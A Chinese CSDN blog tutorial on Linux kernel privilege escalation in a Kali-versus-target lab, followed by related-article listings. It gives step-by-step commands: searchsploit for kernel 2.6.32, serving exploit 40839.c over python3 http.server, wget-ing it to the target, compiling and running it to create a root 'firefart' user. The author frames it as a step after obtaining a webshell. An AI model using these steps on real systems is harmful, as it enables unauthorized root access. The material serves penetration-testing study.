Linux内核提权(保姆级)

最新推荐文章于 2024-08-10 07:18:09 发布
最新推荐文章于 2024-08-10 07:18:09 发布
阅读量1.4k 收藏 15
点赞数 9
分类专栏: Linux提权 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_75163847/article/details/134948418
版权

为什么要进行提权?

我们通常拿到的webshell大部分都是普通用户,有些文件没有权限操作,这个时候我们就要进行提权了。

操作要求

一台攻击机 kali

一台靶机 linux

操作步骤:

1.查看靶机的内核版本

uname -a

uname -r

2.kali搜索该版本的漏洞

searchsploit 2.6.32

3.kali下载可利用漏洞的版本

searchsploit -m+版本号

(先测试debian版本在测试其他)

4.kali开启python3远程下载端口

python3 -m http.server

5.靶机下载

wget+kali ip +端口 / +利用漏洞版本号

gcc -pthread 40839.c -o 40839 -lcrypt

解析一下

6.给利用漏洞加权限

chmod +x 40839

然后直接执行

./40839

会自动创建一个firefart用户

设置一个密码

7.切换到firefart

su firefart

密码为刚才设置的

8.最后成功记得恢复

漂泊的菜鸟
关注
专栏目录
CVE-2023-32233 (LINUX内核权限提升漏洞)
m0_65354386的博客
07-06 1582
Linux内核版本v5.14 — v6.6的netfilter 子系统nf_tables组件中存在释放后使用漏洞,由于在nft_verdict_init()函数中,允许正值作为hook判决中的丢弃错误,因此当NF_DROP发出类似于NF_ACCEPT的丢弃错误时,nf_hook_slow()函数可能会导致双重释放漏洞,从而本地低权攻击者可利用该漏洞将权限提升为root,对目标进行恶意攻击。目前该漏洞已经修复,受影响用户可通过升系统或禁用受影响的 nf_tables 内核模块可以缓解此漏洞。
103.网络安全渗透测试—[权限提升篇1]—[Linux内核漏洞提权]
qwsn
02-15 7268
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、LINUX 内核漏洞提权 1、漏洞背景: 2、漏洞利用: (1)实验环境 (2)靶机链接 (3)突破MIME类型限制文件上传获取webshell (4)创建交互式shell (5)查看linux发行版 (6)查找可用的提权exp (7)进行提权 (8)切换shell
Linux Exploit Suggester 使用与安装教程
最新发布
gitblog_00495的博客
08-10 376
Linux Exploit Suggester 使用与安装教程 Linux_Exploit_SuggesterLinux Exploit Suggester; based on operating system release number 项目地址:https://gitcode.com/gh_mirrors/li/Linux_Exploit_Suggester 1. 项目目录结构及介绍 Li...
Linux提权
小袁的博客
11-30 1392
linux提权
Linux提权内核漏洞提权
m0_74282605的博客
03-30 988
在渗透过程中,有时利用某些漏洞可以获取一个低权限的用户,然后想办法提权,提升到root用户权限,从而控制整个系统。在获取到低权限shell后,通常会检查操作系统的发行版本、内核版本,老版本的系统可能会存在一些漏洞,于是我们可以利用这些版本漏洞进行提权。下面给大家带来的是一些内核提权的例子。今天简单向大家讲解了利用内核漏洞去进行提权的操作,可以发现内核漏洞最主要的就是信息获取后寻找对应的内核漏洞再去攻击,因为内核漏洞有很多所以就挑出了两个常见而且常用的来给大家演示一下,如果对本文感兴趣不妨一键三连。
Linux权限提升—内核、SUID、脏牛等提权
剁椒鱼头没剁椒的博客
04-02 3385
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
LINUX提权入门手册
XINO
02-12 1354
简单介绍一下LINUX提权的大体结构和知识点
【学习笔记】-提权篇(保姆)
rm -rf *
01-30 560
内网渗透(详细、初)、提权手段归纳
VMware workstation搭建CentOS(Linux)PS:保姆教程
qq_35929289的博客
04-15 868
虚拟机搭建Linux系统(保姆图文教程)
Linux内核的ext4文件系统代码进行保姆别的讲解
03-27
ext4文件系统是Linux内核中常用的文件系统之一,它是ext3文件系统的升版,支持更大的文件和更快的访问速度。以下是ext4文件系统的一些基本原理: 1. 数据块:ext4文件系统使用数据块来存储文件和目录。每个数据块...
iTop4412精英版配置支持NFS文件系统服务器和QT并烧录到开发板上,保姆教程,遇到了各种错误。
03-31
#### 嵌入式Linux实验讯为ITop4412定制内核 本篇教程主要针对嵌入式Linux开发人员,旨在帮助大家解决在定制ITop4412开发板内核时遇到的各种问题,特别是支持NFS文件系统和QT图形界面的过程中所遇到的具体错误。 ##...
linux 全自动提权脚本.
02-24
linux 全自动提权脚本.
最全的WEBSHELL提权方法总结
12-28
最全的WEBSHELL提权方法总结,非常的经典。网站入侵和网络安全必看
2023最新版kali安装教程-保姆
08-01
《2023最新版kali安装教程-保姆详解》 Kali Linux是一款基于Debian的开源操作系统,专门用于网络安全审计和渗透测试。本文将详细介绍2023年最新版Kali Linux的安装步骤,从下载镜像到在VMware上创建虚拟机,再到...
Linux提权工具(linux-exploit-suggester、优)
墨痕诉清风的博客
04-22 784
【代码】Linux提权工具(linux-exploit-suggester.git、优)
靶机Lampiao之脏牛提权
m0_52754338的博客
10-02 1626
同样,将下载好的脏牛EXP,上传至目标靶机中,然后msf进入shell,然后编译成可执行文件,利用python开一个模拟终端,开启终端相当于ssh连接(通俗理解),有一个交互式连接。发现是Drupal的网站,查找相关的漏洞,存在远程代码执行的漏洞,msf中带有payload直接利用,设置攻击ip和端口,运行即可。可以看出,真正拿下Linux,权限还是不够,对Linux进行信息收集,查看可以用的漏洞,并提升权限至root。扫描靶机的端口,查看开放了哪些端口,发现1898端口开放,尝试访问。
Linux下WEBSHELL提权
fengling132的专栏
03-30 2364
用phpshell2.0和Linux Kernel2.6x 本地溢出代码配合提ROOT,现在不少LINUX主机都还有这个本地溢出漏洞。 前提:1、目标机上安装了GCC能编译源码                  2、Kernel 2.6.x         (>= 2.6.13 && 因为是在webshell里溢出成功也得不到返回的ROOT SHELL,所以要稍微修改下源码,把
Kali Linux渗透测试——提权
Captain_RB的博客
03-03 4662
Kali Linux渗透测试——提权 笔记内容参考安全牛苑房弘老师的Kali Linux渗透测试教程 文章目录Kali Linux渗透测试——提权一、关于权限(一)WindowsNT(二)Linux 一、关于权限 对不同的用户设置合适的权限是保证多任务操作系统安全的重要一环,取得shell并拿到系统权限,就相当于完全掌握了攻击目标的控制权。设置用户权限的一个基本原则即:设置最少的服务,分配最小...
Linux提权详解(一)
胖虎的博客
10-30 702
Linux提权方法和详解
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值